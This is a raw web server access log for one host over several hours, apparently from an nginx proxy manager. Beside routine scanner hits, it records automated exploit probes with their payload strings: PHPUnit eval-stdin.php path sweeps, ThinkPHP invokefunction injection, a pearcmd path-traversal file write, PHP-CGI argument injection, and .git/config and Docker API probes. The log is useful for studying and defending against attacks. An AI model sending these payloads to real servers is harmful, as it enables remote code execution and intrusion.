"libredtail-http" "-" +[27/Jan/2026:20:45:50 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:50 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:51 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:52 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:52 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:53 +0000] 404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:53 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:53 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:54 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:54 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:54 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:55 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:56 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:57 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:57 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:58 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:45:58 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:02 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:02 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:03 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:04 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:04 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:04 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:05 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:05 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:06 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:06 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:06 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:07 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:08 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:08 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:12 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:13 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:21 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:21 +0000] 404 - GET http 91.82.215.191 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:23 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:23 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../tmp/index1" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:46:24 +0000] 404 - GET http 91.82.215.191 "/containers/json" [Client 115.190.108.231] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:20:56:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:20:56:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 85.217.140.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)" "-" +[27/Jan/2026:20:57:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:21:04:19 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:21:05:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:21:08:18 +0000] 400 - GET http 91.82.215.191 "/" [Client 81.29.142.100] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.38" "-" +[27/Jan/2026:21:08:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.222.218] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36" "-" +[27/Jan/2026:21:31:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:21:33:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:21:49:36 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:21:50:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 185.247.137.135] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[27/Jan/2026:21:53:07 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:21:53:31 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 102.244.97.186] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:21:53:32 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 102.244.97.186] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:21:53:32 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:33 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 102.244.97.186] [Length 154] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:34 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:34 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:35 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:35 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:36 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:36 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:37 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:37 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:38 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:39 +0000] 404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:39 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:40 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:40 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:41 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:42 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:42 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:43 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:44 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:44 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:45 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:45 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:46 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:46 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:47 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:48 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:49 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:50 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:50 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:51 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:52 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:52 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:53 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:54 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:54 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:55 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:55 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:56 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:57 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:57 +0000] 404 - GET http 91.82.215.191 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:58 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:58 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../tmp/index1" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:53:59 +0000] 404 - GET http 91.82.215.191 "/containers/json" [Client 102.244.97.186] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:21:56:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:21:58:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:22:00:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 77.90.185.18] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:22:03:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[27/Jan/2026:22:03:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:22:15:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:22:21:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:22:26:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:22:35:17 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:22:41:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 157.230.17.22] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:22:42:55 +0000] 404 - GET http 91.82.215.191 "/.well-known/security.txt" [Client 162.216.149.244] [Length 150] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[27/Jan/2026:22:48:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:22:50:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:23:02:25 +0000] 400 - GET http localhost "/" [Client 164.92.182.25] [Length 252] [Gzip -] "-" "-" +[27/Jan/2026:23:02:26 +0000] 400 - POST http 91.82.215.191 "/sdk" [Client 164.92.182.25] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[27/Jan/2026:23:02:26 +0000] 400 - GET http 91.82.215.191 "/odinhttpcall1769554945" [Client 164.92.182.25] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[27/Jan/2026:23:02:27 +0000] 400 - GET http 91.82.215.191 "/evox/about" [Client 164.92.182.25] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[27/Jan/2026:23:02:27 +0000] 400 - GET http 91.82.215.191 "/HNAP1" [Client 164.92.182.25] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[27/Jan/2026:23:02:28 +0000] 400 - GET http localhost "/" [Client 164.92.182.25] [Length 252] [Gzip -] "-" "-" +[27/Jan/2026:23:02:28 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[27/Jan/2026:23:02:29 +0000] 400 - GET http 91.82.215.191 "/" [Client 164.92.182.25] [Length 252] [Gzip -] "-" "-" +[27/Jan/2026:23:03:07 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 13.74.146.113] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:23:04:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:23:07:10 +0000] 400 - - http localhost "-" [Client 91.224.92.114] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:23:08:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:23:15:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:23:17:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:23:22:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 146.190.103.103] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:23:23:03 +0000] 400 - - http localhost "-" [Client 68.183.180.73] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:23:32:40 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 213.209.159.181] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:35:21 +0000] 400 - GET https localhost "/" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:23:38:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:23:39:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:23:42:15 +0000] 400 - GET http 91.82.215.191 "/" [Client 206.168.34.126] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[27/Jan/2026:23:42:15 +0000] 400 - - http localhost "-" [Client 206.168.34.126] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:23:42:21 +0000] 400 - GET http 91.82.215.191 "/wiki" [Client 206.168.34.126] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[27/Jan/2026:23:47:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" 